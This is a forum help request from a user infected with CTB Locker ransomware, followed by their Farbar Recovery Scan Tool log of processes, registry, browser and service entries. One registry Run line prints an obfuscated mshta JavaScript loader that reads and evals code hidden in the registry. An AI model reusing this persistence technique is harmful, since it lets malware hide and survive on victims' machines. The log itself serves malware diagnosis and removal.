Infected with CTB Locker



#1 Deside93


Posted 01 June 2015 - 03:04 PM

Hello!
My computer has been infected by CTB Locker today, 1st June 2015, and I honestly do not know what to do. I know my files are encrypted and the only way to unlock them is paying (and I do not want to as I don't care about my files, I've got a good backup).
I just want to be sure I deleted the malware.
My desktop has an image that explains the procedure I've to follow in order to pay and unlock my files (download tor browser and other things I do not understand). My personal files and photos have some strange extensions.

Can you please help me?
Sorry for my English!!

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-05-2015
Ran by Giovanni (administrator) on GIOVANNI-HP on 01-06-2015 21:50:11
Running from C:\Users\Giovanni\Downloads
Loaded Profiles: Giovanni (Available Profiles: Giovanni)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: Italiano (Italia)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASCService.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(EasyBits Software AS) C:\Windows\SysWOW64\ezSharedSvcHost.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\18.7.2.3\ccsvchst.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\18.7.2.3\ccsvchst.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files (x86)\IObit\Advanced SystemCare 8\RealTimeProtector.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsd.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
(ThreatTrack Security, Inc.) C:\Program Files (x86)\STOPzilla\SBAMSvc.exe
(www.shadowexplorer.com) C:\Program Files (x86)\ShadowExplorer\sesvc.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\...\Run: [**e7921432<*>] => mshta javascript:QYVy9thhg="Uk6";i1j9=new%20ActiveXObject("WScript.Shell");S8psbceX="Yoa299EH";YsQE36=i1j9.RegRead("HKLM\\software\\Wow6432Node\\82df414c\\31a74d1c");PFDgEA0DA="xpr";eval(YsQE36);gemCD (the data entry has 15 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [54072 2015-04-14] (Malwarebytes Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\...\Policies\Explorer: [Run] "C:\Users\Giovanni\AppData\Roaming\Microsoft\Windows\IEUpdate\choice.exe"
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2015-02-19] (Microsoft Corporation)
Startup: C:\Users\Giovanni\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2014-12-15]
ShortcutTarget: Dropbox.lnk -> C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Giovanni\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll [2015-02-11] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b2753f75-9f16-43f8-a6aa-560f7f38d639} <======= ATTENTION (Policy restriction on IP)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {1CC05D02-EAD9-4ECB-9E41-535AF217CE33} URL = http://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {44B3BCE6-270C-4C78-94C7-8D53230EED78} URL = http://it.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {5394E963-980B-42BC-8D8A-ED5CCE801142} URL = http://it.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {1CC05D02-EAD9-4ECB-9E41-535AF217CE33} URL = http://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {44B3BCE6-270C-4C78-94C7-8D53230EED78} URL = http://it.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {5394E963-980B-42BC-8D8A-ED5CCE801142} URL = http://it.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> DefaultScope {1CC05D02-EAD9-4ECB-9E41-535AF217CE33} URL = http://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> {1CC05D02-EAD9-4ECB-9E41-535AF217CE33} URL = http://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> {44B3BCE6-270C-4C78-94C7-8D53230EED78} URL = http://it.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> {5394E963-980B-42BC-8D8A-ED5CCE801142} URL = http://it.search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-03-10] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2015-04-14] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2015-03-04] (Microsoft Corporation)
BHO-x32: Symantec NCO BHO -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\18.7.2.3\coIEPlg.dll [2012-06-07] (Symantec Corporation)
BHO-x32: Symantec Intrusion Prevention -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\18.7.2.3\IPS\IPSBHO.DLL [2011-03-31] (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-12-11] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2015-04-14] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-04-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-12-11] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Toolbar: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-16] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-16] (Microsoft Corporation)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
 
FireFox:
========
FF ProfilePath: C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default
FF Homepage: hxxp://www.google.com/
FF SelectedSearchEngine: mystartsearch
FF DefaultSearchEngine: mystartsearch
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll [2015-04-15] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-12-11] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-12-11] (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll [2015-04-15] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2010-05-05] (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-21] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.72.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-12-11] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.72.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-12-11] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-02-17] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2014-12-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-16] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-17] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-02-05] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mystartsearch.xml [2015-04-27]
FF Extension: Ads Removal - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\adremoveext@adremoveext.net [2014-11-29]
FF Extension: Microsoft Default Manager - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\DefaultManager@Microsoft [2014-07-01]
FF Extension: Advanced SystemCare Surfing Protection - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\iobitascsurfingprotection@iobit.com [2014-11-29]
FF Extension: ExstraCooupono - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\ZAXde@7.com [2015-05-08]
FF Extension: MsxmlIsland - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\{37785233-93AF-883B-AF47-11A5FE69E9A5} [2015-06-01]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\IPSFF
FF Extension: Symantec Intrusion Prevention - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\IPSFF [2014-06-17]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\coFFPlgn_2011_7_13_2
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\coFFPlgn_2011_7_13_2 [2015-06-01]
FF HKLM-x32\...\Firefox\Extensions: [sweetsearch@gmail.com] - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\extensions\sweetsearch@gmail.com
FF HKU\S-1-5-21-2758695802-2872600399-379456914-1000\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
FF Extension: McAfee Security Scan Plus - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]
 
Chrome: 
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Profile: C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (YouTube) - C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2009-01-01]
CHR Extension: (Google Search) - C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2009-01-01]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-05-15]
CHR Extension: (Google Wallet) - C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-04-30]
CHR Extension: (Gmail) - C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2009-01-01]
CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] - http://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdvancedSystemCareService8; C:\Program Files (x86)\IObit\Advanced SystemCare 8\ASCService.exe [814880 2015-04-03] (IObit)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2736824 2015-04-07] (Microsoft Corporation)
R2 ezSharedSvc; C:\Windows\SysWOW64\ezSharedSvcHost.exe [514232 2010-04-23] (EasyBits Software AS) [File not signed]
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [118048 2015-05-27] (Elex do Brasil Participações Ltda)
S4 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2010-05-19] (Hewlett-Packard Company) [File not signed]
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2585408 2015-04-02] (IObit)
S4 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\18.7.2.3\ccSvcHst.exe [130008 2011-04-17] (Symantec Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
S4 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R3 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-12-11] (Realtek Semiconductor)
R2 RtVOsdService; C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe [315392 2010-06-17] (Realtek Semiconductor Corp.) [File not signed]
R3 SBAMSvc; C:\Program Files (x86)\STOPzilla\SBAMSvc.exe [3937472 2014-01-07] (ThreatTrack Security, Inc.)
R2 sesvc; C:\Program Files (x86)\ShadowExplorer\sesvc.exe [9216 2013-01-02] (www.shadowexplorer.com) [File not signed]
R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [1026432 2015-06-01] (Enigma Software Group USA, LLC.)
S2 sz7; C:\Program Files (x86)\STOPzilla\SZServer.exe [1592624 2015-04-06] (iS3, Inc.)
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 GameConsoleService; No ImagePath
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R1 BHDrvx64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\Definitions\BASHDefs\20140718.001\BHDrvx64.sys [1530160 2014-06-06] (Symantec Corporation)
R1 cnnctfy3; C:\Windows\System32\DRIVERS\cnnctfy3.sys [35352 2014-06-16] (Connectify)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2009-01-01] (Disc Soft Ltd)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [486192 2014-06-16] (Symantec Corporation)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2015-06-01] ()
R3 gfiark; C:\Windows\System32\drivers\gfiark.sys [41032 2013-05-23] (ThreatTrack Security)
R3 gfiutil; C:\Windows\System32\drivers\gfiutil.sys [31264 2013-09-04] (ThreatTrack Security)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-05-06] (REALiX™)
R1 IDSVia64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\Definitions\IPSDefs\20140731.001\IDSvia64.sys [525016 2014-06-16] (Symantec Corporation)
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [260856 2015-05-27] (Elex do Brasil Participações Ltda)
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [53568 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [108616 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [50944 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [102416 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2015-04-17] (Elex do Brasil Participações Ltda)
U0 jbhqfl; C:\Windows\System32\drivers\bdpb.sys [79064 2015-06-01] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
S3 NAVENG; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\Definitions\VirusDefs\20140803.034\ENG64.SYS [126040 2014-08-03] (Symantec Corporation)
S3 NAVEX15; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\Definitions\VirusDefs\20140803.034\EX64.SYS [2099288 2014-08-03] (Symantec Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
